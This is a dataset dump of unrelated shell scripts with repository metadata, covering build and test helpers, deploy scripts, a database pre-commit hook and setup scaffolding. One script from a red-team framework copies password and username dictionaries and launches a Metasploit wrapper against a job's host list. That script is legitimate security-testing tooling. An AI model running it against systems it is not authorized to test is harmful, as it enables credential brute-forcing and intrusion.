assert [ ! -e "${temp_dir}/appendfile" ]
}
@test "bl_retry_constant fails with non-integer retry count" {
run bl_retry_constant "this" 1 date
assert_failure
assert_output --partial number
assert [ ! -e "${temp_dir}/appendfile" ]
}
@test "bl_retry_constant fails with non-integer interval" {
run bl_retry_constant 2 "this" date
assert_failure
assert_output --partial interval
assert [ ! -e "${temp_dir}/appendfile" ]
}
@test "bl_retry_constant succeeds with compound statements" {
run bl_retry_constant 3 1 "true && date >> ${afile}"
assert_success
assert_equal $(wc -l <${afile}) 1
}
| true
|
eca26f90a2e746a3993fcf9aa93458a0f7c01212
|
Shell
|
Mount565/binlogDumper
|
/find_sql_for_gtid.sh
|
UTF-8
| 414
| 3.546875
| 4
|
[] |
no_license
|
#!/bin/bash
# Print the statement recorded under a given GTID in a binlog dump file.
# awk splits each line on the literal "GTID:"; when the remainder equals
# the requested GTID it prints that marker line and arms a flag (n=1) so
# the following line is printed as well.
if [ $# -ne 2 ];then
echo "Usage: sql file and an GTID arg are required. "
echo "This program will print all the sql statement included in the GTID which is the arg you passed."
echo "eg: $0 rollback_2018-07-26.sql d5902ad8-ec43-11e7-9df7-5254006b29ec:4567774"
exit 1;
fi
file=$1
gtid=$2
cat $file | awk -v gtid=$gtid -F 'GTID:' '{if ($2==gtid) {n=1;print $0 } else if(n==1){print $0;n=0;}}'
| true
|
21a28c144fda331b60fdce0386cb9ed8760b6852
|
Shell
|
kingman/home-lab
|
/provisioning/esp32/smart_desk/scripts/initialize-esp-idf.sh
|
UTF-8
| 1,163
| 4.5
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Set up the ESP-IDF toolchain: clone (or fast-forward) the esp-idf
# repository into the path given as $1, then run its install script.
set -e
set -o pipefail
# Clone the repository into destination_dir, or pull --ff-only if a
# clone is already there.
# Arguments: $1 - destination directory, $2 - repository URL.
clone_git_repository_if_not_cloned_already() {
destination_dir="$1"
git_repository_url="$2"
if [ -z "$destination_dir" ]; then
echo "ERROR while cloning the $git_repository_url git repository: The destination_dir variable is not set, or set to an empty string"
exit 1
fi
if [ -d "$destination_dir/.git" ]; then
echo "$destination_dir already exists and is a Git repository. Pulling the latest changes..."
echo "Updating $git_repository_url in $destination_dir"
git -C "$destination_dir" pull --ff-only
else
mkdir -p "$destination_dir"
echo "Cloning $git_repository_url in $destination_dir"
git clone --recursive "$git_repository_url" "$destination_dir"
fi
# The variables are not local-scoped, so unset them to avoid leaking
# into the caller's environment.
unset destination_dir
unset git_repository_url
}
ESP_IDF_PATH="$1"
echo "Setting up ESP-IDF in $ESP_IDF_PATH..."
clone_git_repository_if_not_cloned_already "$ESP_IDF_PATH" "https://github.com/espressif/esp-idf.git"
echo "$ESP_IDF_PATH contents:"
ls -al "$ESP_IDF_PATH"
cmake --version
echo "Running the ESP-IDF installation script..."
"$ESP_IDF_PATH"/install.sh
| true
|
228320d7cb6ed5e90c3e3b106c72ecadf085ef08
|
Shell
|
TomYang9/attack-surface-framework
|
/redteam/metasploit/start
|
UTF-8
| 1,774
| 3.21875
| 3
|
[
"BSD-2-Clause",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
#!/bin/bash
# Launch a Metasploit wrapper job for the given ASF JobID: prepare a
# timestamped output folder with the job's input/dictionary files, then
# run manage.py msfwrapper in the background and wait for it.
# Usage: start <JobID>
if test "f$1" "=" "f"
then
echo "Error, please specify a JobID"
exit 1
fi
. /opt/asf/tools/scripts/arguments metasploit $1
DATE_STAMP=`date +"%Y%m%d%H%M%S"`
JOB_FOLDERS="/home/asf/jobs"
JOB_FOLDER="$JOB_FOLDERS/$1"
JOB_OUTPUT_FOLDER="$JOB_FOLDER/$DATE_STAMP"
TERM="xterm"
if ! test -e "$JOB_FOLDER"
then
echo "Error, JobID $1 is invalid"
exit 1
fi
# BUGFIX: the lock path was the literal string "JOB_FOLDER/.lock"
# (missing $), so a running job was never detected.
if test -e "$JOB_FOLDER/.lock"
then
echo "Error, process is already running"
exit 1
fi
echo > "$JOB_FOLDER/.lock"
cd /opt/asf/frontend/asfui
. bin/activate
python3 /opt/asf/frontend/asfui/manage.py remaster_input --input JobID:$1 --parser host --output "$JOB_FOLDER/app.input"
mkdir -p "$JOB_OUTPUT_FOLDER"
cp /opt/asf/tools/dicts/default.dict "$JOB_FOLDER/app.dict"
cp /opt/asf/tools/dicts/users.dict "$JOB_FOLDER/app.users"
# Snapshot the job's working files into the timestamped output folder.
for mode in input asf dict users
do cp -v "$JOB_FOLDER/app.$mode" "$JOB_OUTPUT_FOLDER/app.$mode"
done
cp -v "$JOB_FOLDER/msf.asfui" "$JOB_OUTPUT_FOLDER/msf.asfui"
echo "python3 /opt/asf/frontend/asfui/manage.py msfwrapper --input=$JOB_OUTPUT_FOLDER/app.input --msfconfig=$JOB_OUTPUT_FOLDER/msf.asfui --output=$JOB_OUTPUT_FOLDER/app.report.txt 2>&1 > $JOB_OUTPUT_FOLDER/app.log"
python3 /opt/asf/frontend/asfui/manage.py msfwrapper --input=$JOB_OUTPUT_FOLDER/app.input --msfconfig=$JOB_OUTPUT_FOLDER/msf.asfui --output=$JOB_OUTPUT_FOLDER/app.report.txt 2>&1 > "$JOB_OUTPUT_FOLDER/app.log" &
#mkdir -p $JOB_OUTPUT_FOLDER/results/
#cp -v $JOB_OUTPUT_FOLDER/app.report.txt $JOB_OUTPUT_FOLDER/results/app.report.txt
JOB_PID=$!
echo $JOB_PID>"$JOB_FOLDER/pid"
# BUGFIX: wait on the captured background PID; the previous "wait $PID"
# referenced an unset variable and returned immediately.
wait $JOB_PID
#python3 /opt/asf/frontend/asfui/manage.py remaster_output --parser=patator.ssh --debug --input="$JOB_OUTPUT_FOLDER/results/RESULTS.csv" --output=JobID:$1
rm -v "$JOB_FOLDER/pid"
rm -v "$JOB_FOLDER/.lock"
| true
|
a64a646a61b4e1abc7bc677fa46d6ef1d8b39893
|
Shell
|
mertinger/cf-checker
|
/test_files/test.sh.old
|
UTF-8
| 3,065
| 3.25
| 3
|
[
"BSD-3-Clause"
] |
permissive
|
#!/bin/ksh
#
# Regression harness for the CF checker: run cfchecks over every *.nc
# test file (with per-file option variations) and diff the output
# against the recorded *.check baselines. Successful runs delete their
# output; failures leave $outdir/<file>.out behind for inspection.
#cd Test_Files
outdir=tests_output.$$
mkdir $outdir
export PYTHONPATH=/home/ros/software/python/cdat-lite:/home/ros/software/python/udunits
std_name_table=http://cfconventions.org/Data/cf-standard-names/current/src/cf-standard-name-table.xml
area_table=http://cfconventions.org/Data/area-type-table/current/src/area-type-table.xml
# Testing w/ CDAT-5.2 and UDUNITS2
#export PATH=/home/ros/software/CDAT-5.2-cdms/bin:$PATH
#export PYTHONPATH=/home/ros/software/CDAT-5.2-cdms/lib/python2.5/site-packages:/home/ros/git-projects/cf-checker/src
#export PYTHONPATH=/home/ros/software/CDAT-5.2-cdms/lib/python2.5/site-packages:/home/ros/cf-checker/branches/r159_cf-1.6/src
#export LD_LIBRARY_PATH=/home/ros/software/udunits2/lib
#export UDUNITS=/home/ros/software/udunits2/share/udunits/udunits2.xml
# udunits-2.1.19
#export LD_LIBRARY_PATH=/home/ros/software/udunits-2.1.19/lib
#export UDUNITS=/home/ros/software/udunits-2.1.19/share/udunits/udunits2.xml
#cfchecker="/home/ros/software/CDAT-5.2-cdms/bin/python ../src/cfchecker/cfchecks.py"
# Python2.6, numpy1.8.0, udunits-2.1.19
export PYTHONPATH=/home/ros/software/cf-checker/lib64/python2.6/site-packages:/home/ros/git-projects/cf-checker/src
export LD_LIBRARY_PATH=/usr/local/netcdf_gnu/lib:/home/ros/software/cf-checker/lib
export UDUNITS=/home/ros/software/cf-checker/share/udunits/udunits2.xml
cfchecker="/usr/bin/python /home/ros/bin/cfchecks-2.0.6a.py"
failed=0
for file in `ls *.nc`
do
# A few files exercise specific checker options / CF versions; the
# rest run with the default CF-1.0 check.
if test $file == "badc_units.nc"
then
# Check --badc option (Note: Need to set path to badc_units.txt in cfchecks.py)
$cfchecker --badc $file -s $std_name_table > $outdir/$file.out 2>&1
elif test $file == "stdName_test.nc"
then
# Check --cf_standard_names option
$cfchecker -s ./stdName_test_table.xml -a $area_table $file > $outdir/$file.out 2>&1
elif test $file == "CF_1_2.nc"
then
# CF-1.2
$cfchecker -s $std_name_table -v 1.2 $file > $outdir/$file.out 2>&1
elif test $file == "flag_tests.nc"
then
# CF-1.3
$cfchecker -s $std_name_table -v 1.3 $file > $outdir/$file.out 2>&1
elif [[ $file == "Trac049_test1.nc" || $file == "Trac049_test2.nc" ]]
then
# CF-1.4
$cfchecker -s $std_name_table -a $area_table -v 1.4 $file > $outdir/$file.out 2>&1
else
# Run the checker on the file
$cfchecker -s $std_name_table -v 1.0 $file > $outdir/$file.out 2>&1
fi
# Check the output against what is expected
result=${file%.nc}.check
diff $outdir/$file.out $result >/dev/null
if test $? == 0
then
echo $file: Success
rm $outdir/$file.out
else
echo $file: Failed
#rc=$((failed += 1))
failed=`expr $failed + 1`
fi
done
# Print Test Results Summary
echo ""
if [[ $failed != 0 ]]
then
echo "****************************"
echo "*** $failed Tests Failed ***"
echo "****************************"
else
echo "****************************"
echo "*** All Tests Successful ***"
echo "****************************"
fi
# Check that the script options
# --cf_standard_names
# --udunits
# --coards
| true
|
3827a76b89aa22fb19af14ce23cc61de5276c829
|
Shell
|
injectedfusion/hedera-gcs-setup
|
/setup.sh
|
UTF-8
| 2,177
| 2.9375
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Setup Script for hedera-gcs-setup
# Scaffolds ~/Desktop/hedera-mirror-node: inventory + vars templates the
# user must fill in, the Ansible playbook, and install/start/stop
# wrapper scripts, then installs the Galaxy role from requirements.yml.
mkdir -pv ~/Desktop/hedera-mirror-node/vars ~/Desktop/hedera-mirror-node/roles
touch ~/Desktop/hedera-mirror-node/inventory.ini
# Placeholder inventory - IPADDRESS/USERNAME are edited by the user.
cat >> ~/Desktop/hedera-mirror-node/inventory.ini <<- _EOF_
[mirrornode]
IPADDRESS ansible_ssh_user=USERNAME
_EOF_
touch ~/Desktop/hedera-mirror-node/roles/requirements.yml
cat >> ~/Desktop/hedera-mirror-node/roles/requirements.yml <<- _EOF_
---
# from github
- src: https://github.com/injectedfusion/hedera-gcs-setup
...
_EOF_
touch ~/Desktop/hedera-mirror-node/vars/project-id.json
# Placeholder GCS credentials - edited by the user afterwards.
cat >> ~/Desktop/hedera-mirror-node/vars/project-id.json <<- _EOF_
{
"access_key":"GOOG1E...",
"secret_key":"H/4...",
"project_id":"Your-Google-Project-ID"
}
_EOF_
touch ~/Desktop/hedera-mirror-node/server_build.yml
cat >> ~/Desktop/hedera-mirror-node/server_build.yml <<- _EOF_
---
- hosts: mirrornode
vars_files:
- ./vars/project-id.json
roles:
- hedera-gcs-setup
...
_EOF_
# Install Ansible Role
ansible-galaxy install -r ~/Desktop/hedera-mirror-node/roles/requirements.yml --force
# Convenience wrappers: each runs the playbook with a different tag.
touch ~/Desktop/hedera-mirror-node/install_services.sh
cat >> ~/Desktop/hedera-mirror-node/install_services.sh <<- _EOF_
#!/bin/bash
ansible-playbook -i ~/Desktop/hedera-mirror-node/inventory.ini ~/Desktop/hedera-mirror-node/server_build.yml --tags "install"
_EOF_
touch ~/Desktop/hedera-mirror-node/start_services.sh
cat >> ~/Desktop/hedera-mirror-node/start_services.sh <<- _EOF_
#!/bin/bash
ansible-playbook -i ~/Desktop/hedera-mirror-node/inventory.ini ~/Desktop/hedera-mirror-node/server_build.yml --tags "start_services"
_EOF_
touch ~/Desktop/hedera-mirror-node/stop_services.sh
cat >> ~/Desktop/hedera-mirror-node/stop_services.sh <<- _EOF_
#!/bin/bash
ansible-playbook -i ~/Desktop/hedera-mirror-node/inventory.ini ~/Desktop/hedera-mirror-node/server_build.yml --tags "stop_services"
_EOF_
chmod +x ~/Desktop/hedera-mirror-node/install_services.sh
chmod +x ~/Desktop/hedera-mirror-node/start_services.sh
chmod +x ~/Desktop/hedera-mirror-node/stop_services.sh
echo "Project Directory Established"
echo "Now go update hedera-mirror-node/inventory.ini and hedera-mirror-node/vars/project-id.json"
| true
|
9c4860028d14dd606113ddd44597af29ee12c7c6
|
Shell
|
Jpocas3212/aur
|
/brick/PKGBUILD
|
UTF-8
| 1,250
| 2.71875
| 3
|
[] |
no_license
|
# Maintainer: Andrew Krasichkov <buglloc _ at _ yandex _ dot _ru>
# Arch Linux PKGBUILD metadata for the brick (Bitrix24 client) package.
pkgname=brick
pkgver=0.1.26.31
pkgrel=1
pkgdesc="Unofficial Bitrix24 messenger client"
arch=('i686' 'x86_64')
url="https://github.com/buglloc/brick"
license=("MIT")
depends=("alsa-lib" "desktop-file-utils" "gconf" "libxtst" "libxss" "xdg-utils" "gtk2" "libnotify" "nss")
optdepends=()
# Alternative packagings of the same project cannot be co-installed.
conflicts=("brick-unity" "brick-git" "brick-unity-git")
makedepends=("p7zip" "cmake")
install=${pkgname}.install
source=("https://github.com/buglloc/brick/archive/v${pkgver}.tar.gz")
# i686 builds additionally fetch a prebuilt CEF bundle (see build()).
source_i686=("https://github.com/buglloc/cef-builds/raw/79c6f03ac3d4eb3332d6c374d9a9cb0fa3be742b/libs/cef-i686.tar.gz")
sha256sums=("f96affeb0d2270057f81e0123376c1830539d8a3c69efb3cc4dde0b5bf6459b2")
sha256sums_i686=("134454435e24ecae8be9430cb36e2a6095f780443e2e09ac05a4e41beb85d253")
# build(): on i686, swap in the prebuilt CEF Release files, then run an
# out-of-tree cmake build with Unity desktop integration disabled.
build() {
cd ${srcdir}
if [ $CARCH == "i686" ];
then
# BUGFIX: the glob was inside the quotes ("…/Release/*"), so it never
# expanded and the stale Release files were not removed before the copy.
rm -f "brick-${pkgver}"/Release/*
cp -arf cef-i686/* "brick-${pkgver}/Release"
fi
mkdir -p out
cd out
cmake -DCMAKE_INSTALL_PREFIX=${pkgdir} -DUNITY_DESKTOP=OFF "../brick-${pkgver}"
make
}
# package(): install into $pkgdir, then replace the installed
# /usr/bin/brick binary with a symlink to the /opt/brick copy.
package() {
cd ${srcdir}/out
make install
install -dm755 "${pkgdir}/usr/bin"
rm -f "${pkgdir}/usr/bin/brick"
ln -s /opt/brick/brick "${pkgdir}/usr/bin/brick"
}
| true
|
ed24d649de85c36c83f18f80b214839105d7f1a4
|
Shell
|
Asenar/prestashop-devtools
|
/.git-templates/prepareAutoupgrade/hooks/pre-commit
|
UTF-8
| 937
| 3.265625
| 3
|
[] |
no_license
|
#!/bin/sh
#
# file : pre-commit
# desc : This hook dump your prestashop database in dump.sql and add this file (git add) before the commit.
# The dump is made with --skip-extended-insert option to make database state comparaison really easy.
# This hook is the reciprocal of post-checkout.
#
#
# author : Michaël Marineti
# creation : 2012-04-30
# modified : 2012-05-28
#
# CHANGELOG
# 2012-05-28
# clean code, add comments
# Pull DB credentials out of the PrestaShop settings file (values are
# the 4th single-quote-delimited field on each define() line).
db_to_save=`grep DB_NAME config/settings.inc.php |awk -F\' '{print $4}'`
dbuser="`grep DB_USER config/settings.inc.php |awk -F\' '{print $4}'`"
dbpass="`grep DB_PASSWD config/settings.inc.php |awk -F\' '{print $4}'`"
# BUGFIX: the user flag previously passed the password (-u$dbpass);
# also quote $dbpass so an empty value can't break the test.
if (test -z "$dbpass") then
mysql_conn_string="-u$dbuser"
else
mysql_conn_string="-u$dbuser -p$dbpass"
fi
mysqldump $mysql_conn_string --skip-comments --skip-extended-insert $db_to_save > dump.sql
if (test $? -ne 0) then
echo "error on mysqldump"
exit 1
fi
git add dump.sql
| true
|
8951f62253dd61a2938bddbeec37be243713a8e3
|
Shell
|
kinshuk-jain/anmonline
|
/scripts/run-server.sh
|
UTF-8
| 703
| 3.90625
| 4
|
[] |
no_license
|
#!/bin/bash
# Deploy the docustore app: fetch the bundle from S3, unpack it into a
# timestamped folder, restart it under pm2, and delete the previous
# deployment folder recorded on the last run.
# download file from s3
aws s3 cp s3://kinarva/docustore.zip .
# rename the file
NAME="docustore"_`date +%Y_%m_%d_%H_%M_%S`
mv docustore.zip $NAME".zip"
# unzip it
unzip $NAME".zip" -d "$NAME"
rm $NAME".zip"
cd $NAME
# Copy pm2 ecosystem file
cp ../ecosystem.config.js .
# restart server
pm2 restart ecosystem.config.js --env production
cd ../
DEST_FILE=./folder_to_delete_on_new_deployment
# if previous deployment exists, read its name from DEST_FILE and delete folder
if [ -f "$DEST_FILE" ]
then
PREV_DEPLOYMENT=`cat $DEST_FILE`
rm -rf "$PREV_DEPLOYMENT"
fi
# save NAME to a file. This will be the name of folder to delete on next deployment
echo "$NAME" > "$DEST_FILE"
| true
|
91bee36ed26071e9f6c68c8eca5b256c0b66e8e4
|
Shell
|
castle-sky/verdaccio
|
/scripts/e2e-setup-ci.sh
|
UTF-8
| 256
| 3.078125
| 3
|
[
"LicenseRef-scancode-free-unknown",
"MIT",
"CC-BY-4.0",
"CC-BY-NC-SA-4.0",
"CC-BY-SA-4.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
#!/usr/bin/env bash
# CI setup for e2e tests: switch into a scratch working directory and
# give git a throwaway identity so test commits succeed.
set -e
HERE_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" >/dev/null 2>&1 && pwd)"
TEMP_DIR="$(mktemp -d)"
cd "${TEMP_DIR}"
echo $TEMP_DIR
echo $HERE_DIR
# NOTE: mutates the global git config of the CI runner - intentional in
# a disposable CI environment.
git config --global user.email "you@example.com"
git config --global user.name "John Doe"
| true
|
80a610b69f6c2190b9ac65b75d24afcdcb7422cb
|
Shell
|
tommibergman/crescendo-pp
|
/create_jobfiles.sh
|
UTF-8
| 541
| 3.421875
| 3
|
[] |
no_license
|
#!/bin/bash
# Generate per-year job files from the *.tmpl templates by substituting
# the literal "yyyy" placeholder with each year in the range.
# Usage: create_jobfiles.sh startyear [endyear]
if [[ -n "${1}" ]]
then
y1=${1}
else
echo "usage ${0} startyear [endyear]"
exit
fi
#if no end
# Default the end year to the start year when only one arg is given.
[[ -n "${2}" ]] && y2=${2} || y2=${1}
if [[ ${y2} -lt ${y1} ]]
then
echo "usage ${0} startyear [endyear]"
echo "endyear must be larger than or equal to staryear"
exit
fi
# eval is needed because brace expansion happens before variable
# expansion, so {$y1..$y2} would otherwise stay literal.
for yyyy in $(eval echo "{$y1..$y2}")
do
sed "s/yyyy/${yyyy}/g" pp_ifs_monthly.job.tmpl > pp_ifs_monthly.${yyyy}.job
sed "s/yyyy/${yyyy}/g" pp_ifs+tm5_merge_copy.job.tmpl > pp_ifs+tm5_merge_copy.${yyyy}.job
echo $yyyy
done
| true
|
8918f845b9edf868bed59bc0b3cae086a925354e
|
Shell
|
ggiammat/r2
|
/application-controller/eels-application-controller/e2c-eels-ac/src/main/resources/vm/eelsdeploy_light.sh
|
UTF-8
| 445
| 2.84375
| 3
|
[
"Apache-2.0"
] |
permissive
|
#install application controller
# Usage: eelsdeploy_light.sh <controller-ip> <agent-ip>...
# Copies the built AC jar + config to the controller host, then the ALA
# jar + config to every agent host, over scp (assumes root SSH access).
IP_AC="${1}"
scp ../target/E2CEelsAC-1.1-SNAPSHOT.jar "root@$IP_AC:eelsAC/"
scp ../applicationcontroller.properties "root@$IP_AC:eelsAC/"
scp ../eelsapplication.properties "root@$IP_AC:eelsAC/"
#install application local agent
shift
# BUG FIX: quote "$@" so host arguments survive word splitting/globbing
for ipaddress in "$@"
do
    scp ../../E2CEelsALA/target/E2CEelsALA-1.1-SNAPSHOT.jar "root@$ipaddress:eelsALA/"
    scp ../../E2CEelsALA/eelslocalagent.properties "root@$ipaddress:eelsALA/"
done
| true
|
f5d0fa34d1a01dec6bac15255ab31c85084a7075
|
Shell
|
stoe/dotfiles
|
/.zshrc
|
UTF-8
| 1,163
| 3.1875
| 3
|
[] |
no_license
|
#!/bin/zsh
# Interactive zsh configuration: PATH, personal dotfiles, history hygiene,
# completion bootstrap and Oh My Zsh initialization.
export PATH=$HOME/bin:/usr/local/bin:$PATH
# Load the shell dotfiles, and then some:
# * ~/.path can be used to extend `$PATH`.
# * ~/.extra can be used for other settings you don’t want to commit.
for file in ~/.{exports,aliases,functions,extra}; do
  [ -r "$file" ] && [ -f "$file" ] && source "$file";
done;
unset file;
setopt HIST_IGNORE_ALL_DUPS # Delete old recorded entry if new entry is a duplicate.
setopt HIST_IGNORE_SPACE # Don't record an entry starting with a space.
setopt HIST_SAVE_NO_DUPS # Don't write duplicate entries in the history file.
autoload -Uz colors && colors
# initialize autocomplete here, otherwise functions won't be loaded
if type brew &>/dev/null; then
  FPATH=$(brew --prefix)/share/zsh/site-functions:$FPATH
fi
# gh shell completion, only when the GitHub CLI is installed
if type gh &>/dev/null; then
  eval "$(gh completion -s zsh)"
fi
autoload -Uz compinit
compinit
# NOTE(review): clears PAGER entirely — presumably to disable paging; confirm intent.
PAGER=
# -- Oh My Zsh -----------------------------------------------------------------
# Path to your oh-my-zsh installation.
export ZSH=$HOME/.oh-my-zsh
ZSH_THEME="af-magic"
plugins=(
  colored-man-pages
  git
  gitignore
  golang
  node
  npm
  nvm
)
source $ZSH/oh-my-zsh.sh
| true
|
f6250d0b5989c5f047c863e21048200c9a08ebae
|
Shell
|
cancenik/translation-variation
|
/SCRIPTS/BASH_SCRIPTS/submit_pickrell_rnaseq.sh
|
UTF-8
| 287
| 2.515625
| 3
|
[] |
no_license
|
#!/bin/bash
# For every GM* sample directory under the Pickrell RNA-seq tree, merge all
# gzipped read files into one FASTQ and submit the alignment job via qsub.
PICKRELL=/srv/gs1/projects/snyder/ccenik/PICKRELL_RNASEQ
cd "$PICKRELL"
for dir in $(find . -maxdepth 1 -mindepth 1 -name 'GM*' -type d -printf '%f\n')
do
    # quote the path so a cd failure cannot leave us in the wrong directory
    cd "$PICKRELL/$dir/"
    pwd
    # decompress and concatenate every read file for this sample
    zcat * > Merged_Reads.fastq
    qsub ~/SCRIPTS/BASH_SCRIPTS/alignment_strategy_pickrell_qsub.sh
done
| true
|
5323b336bf25fc72805be67635b8df6dc2d09628
|
Shell
|
pizzanfruit/react-remote-container
|
/.vscode/docker-network-disconnect.sh
|
UTF-8
| 219
| 2.96875
| 3
|
[] |
no_license
|
#!/bin/sh
# Disconnect this container (identified by $HOSTNAME) from the given docker
# network; used when tearing down the VS Code dev container.
# BUG FIX: the original first line was "# !/bin/sh" — the space made it a
# plain comment, so the kernel ignored the shebang entirely.
DEVCONTAINER_NETWORK_NAME=$1
if [ -z "$DEVCONTAINER_NETWORK_NAME" ]; then
  echo "Please provide network to disconnect from"
  exit 1;
fi
docker network disconnect "$DEVCONTAINER_NETWORK_NAME" "$HOSTNAME"
| true
|
c2e1a32dc6153bb5e2955dc97e54a9ee8ebd0723
|
Shell
|
project-oak/oak
|
/scripts/build_reproducibility_index
|
UTF-8
| 1,061
| 3.96875
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
#
# Check that artifacts can be reproducibly built, both when re-building them on the same machine
# over time, but also when built on different machines (e.g. locally vs on GCP).
#
# This script should be re-run every time any of these artifacts changes, and should be checked in
# so that we can enforce in CI that the hashes are indeed consistent.

readonly SCRIPTS_DIR="$(dirname "$0")"

# shellcheck source=scripts/common
source "$SCRIPTS_DIR/common"

# Each positional argument is a base64-encoded digest entry for one artifact
# that must build reproducibly.
readonly REPRODUCIBLE_ARTIFACTS=( "$@" )

# Index file containing hashes of the reproducible artifacts, alongside their file names.
readonly REPRODUCIBILITY_INDEX='./reproducibility_index'

# Start from a fresh index (a single blank line), echoed to stdout as well.
echo "" | tee "${REPRODUCIBILITY_INDEX}"

# Append the decoded digest line of every artifact to the index.
for entry in "${REPRODUCIBLE_ARTIFACTS[@]}"; do
  echo "${entry}" | base64 -d | tee -a "${REPRODUCIBILITY_INDEX}"
done
| true
|
d9ae54534a7beb7d65d9be510a7d14d22db189c6
|
Shell
|
allisterke/invest-lab
|
/concept/decorate-cz.sh
|
UTF-8
| 508
| 2.734375
| 3
|
[] |
no_license
|
#!/bin/bash
# Read Chinese text line by line from stdin and emit HTML in which the date
# expression preceding each occurrence of $KEY (重组, "restructuring") is
# wrapped in a green bold span and the keyword itself in a red bold span.
# Recognized date forms: YYYY年MM月DD日, YYYY年MM月, YYYY年.
KEY=重组
while read -r LINE; do
  echo "$LINE" |\
  perl -ne 's/([[:digit:]]+年[[:digit:]]+月[[:digit:]]+日|[[:digit:]]+年[[:digit:]]+月|[[:digit:]]+年)((?:(?![[:digit:]]+年[[:digit:]]+月[[:digit:]]+日|[[:digit:]]+年[[:digit:]]+月|[[:digit:]]+年).)*)('$KEY')/<span style="font-style:italic; font-weight:bolder; font-size:xx-large; background:lightgreen;">\1<\/span>\2<span style="color:red; font-style:italic; font-weight:bolder; font-size:xx-large;">\3<\/span>/g; print;'
done
| true
|
9347723670a03ea16c6b4446279433c052c26451
|
Shell
|
ryanplusplus/hld-save-utils
|
/edit.sh
|
UTF-8
| 343
| 2.734375
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Edit a base64-encoded save file in place: decode it, split off the fixed
# 60-byte header, let the user edit the body in vi, then re-encode
# header + body back over the original. A backup (backup.sav) is written
# next to the original first.
TMPDIR=$(mktemp -d)
# clean up the scratch directory on any exit path (original leaked it)
trap 'rm -rf -- "$TMPDIR"' EXIT
cp "$1" "$(dirname "$1")/backup.sav"
base64 --decode < "$1" > "$TMPDIR/decoded"
# the first 60 bytes are an opaque header that must be preserved verbatim
dd count=60 if="$TMPDIR/decoded" of="$TMPDIR/header" bs=1 >& /dev/null
dd skip=60 if="$TMPDIR/decoded" of="$TMPDIR/body" bs=1 >& /dev/null
vi "$TMPDIR/body"
cat "$TMPDIR/header" "$TMPDIR/body" > "$TMPDIR/modified"
base64 < "$TMPDIR/modified" > "$1"
| true
|
8cbfd43372d7a97c887aa47f2e4ceaf2bb3f11a8
|
Shell
|
stiles69/bin
|
/Set-MOTD.sh
|
UTF-8
| 1,197
| 3.296875
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
#===============================================================================
#
#          FILE: Set-MOTD.sh
#
#         USAGE: ./Set-MOTD.sh
#
#   DESCRIPTION: Interactively build a message-of-the-day banner with the
#                given contact details and install it as /etc/motd.
#
#       OPTIONS: ---
#  REQUIREMENTS: $HOME/lib/sh/funcDisplayHostname.sh (DisplayHostname)
#          BUGS: ---
#         NOTES: ---
#        AUTHOR: Brett Salemink (), admin@roguedesigns.us
#  ORGANIZATION: Rogue Designs
#       CREATED: 07/18/2018 17:16
#      REVISION: ---
#===============================================================================
set -o nounset # Treat unset variables as an error
# Provides the DisplayHostname function used below.
. $HOME/lib/sh/funcDisplayHostname.sh
# Interactively collect the contact details to embed in the banner.
echo "What do you want for a contact name?"
read CONTACTNAME
echo "What is your contact email address?"
read CONTACTEMAIL
HOSTER="$(DisplayHostname)"
# Build the banner in /tmp first, then install it with sudo.
echo "========================================================" > /tmp/Motd
echo " Welcome to Linux" >> /tmp/Motd
echo "Custom Linux Install by $CONTACTNAME <$CONTACTEMAIL>." >> /tmp/Motd
echo "========================================================" >> /tmp/Motd
echo " Rogue Designs $HOSTER" >> /tmp/Motd
echo "========================================================" >> /tmp/Motd
sudo cp /tmp/Motd /etc/motd
| true
|
4930ac60f826d08b44d20997e95a7c6c2782370d
|
Shell
|
raphaelmeyer/playground-6pnwam0r
|
/cmake-project/common.sh
|
UTF-8
| 800
| 4
| 4
|
[] |
no_license
|
#!/bin/bash
# Shared helpers for the tech.io CMake playground exercises.

# Abort the exercise: emit a hint message and a failure marker on the
# TECHIO control channel, then exit with the given code.
function fail {
  exit_code=$1
  message=$2
  echo "TECHIO> message --channel \"Hint!\" ${message}"
  echo "TECHIO> success false"
  exit ${exit_code}
}

# Abort via fail when the previous command's exit code is non-zero.
function check_failure {
  exit_code=$1
  if [ ${exit_code} -ne 0 ]; then
    fail ${exit_code} "CMake build failed."
  fi
}

# Configure and build the given project dir with CMake + Ninja, echoing
# each step; pipefail makes the piped cmake status reach check_failure.
function run_cmake {
  project_dir=$1
  build_dir=${project_dir}/build
  set -o pipefail
  echo "! $(pwd) > mkdir -p ${build_dir}"
  mkdir -p ${build_dir}
  echo "! $(pwd) > cd ${build_dir}"
  cd ${build_dir}
  echo "! $(pwd) > cmake -G Ninja ${project_dir}"
  # sed indents tool output so it reads as nested under the echoed command
  cmake -G Ninja ${project_dir} | sed 's/^/ /'
  check_failure $?
  echo "! $(pwd) > cd ${project_dir}"
  cd ${project_dir}
  echo "! $(pwd) > cmake --build ${build_dir}"
  cmake --build ${build_dir} | sed 's/^/ /'
  check_failure $?
}
| true
|
e3cbd9f57155671677b3f931d29d9b1ffaa4acd3
|
Shell
|
redhat-cip/osp-delivery-tools
|
/analyse_heat.sh
|
UTF-8
| 2,061
| 3.71875
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
#
# Copyright (C) 2015 Red Hat, Inc.
#
# Author: Hugo Rosnet <hrosnet@redhat.com>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.

OUTPUT_TO_FILE=false
STACK=overcloud
LEVEL=3
FILE="deploy-fail-$(date '+%Y%m%d-%H%M%S').txt"
# Matching for "server_id": "c18426be-fb53-48e7-9dc5-4d96b394ea69"
MATCH_DEPLOY='[[:alnum:]]\{8\}-\([[:alnum:]]\{4\}-\)\{3\}[[:alnum:]]\{12\}'

function _usage() {
    echo "This script allow to have all errors/server name/IP from resources that failed during a deployment."
    echo ""
